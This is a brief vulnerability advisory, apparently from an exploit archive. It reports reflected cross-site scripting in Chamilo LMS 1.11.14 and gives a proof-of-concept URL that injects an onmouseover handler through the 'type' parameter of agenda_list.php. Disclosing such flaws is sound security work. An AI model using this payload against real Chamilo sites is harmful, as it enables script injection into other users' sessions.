Chamilo LMS 1.11.14 Cross Site Scripting

Chamilo LMS version 1.11.14 suffers from a cross site scripting vulnerability.

POC:

URL: http://alihost/chamilo/main/calendar/agenda_list.php?type=x
"%20onmouseover=netsparker(0x01CE61)%20x="#collapse-personal_1
Parameter Name: type
Parameter Type: GET
Attack Pattern: x%22+onmouseover%3dnetsparker(0x01CE61)+x%3d%22

Exploit

Cross Site Scripting

Metasploit Module Program Note - http_version Previous

Backdoor.Win32.Zetronic Denial Of Service Next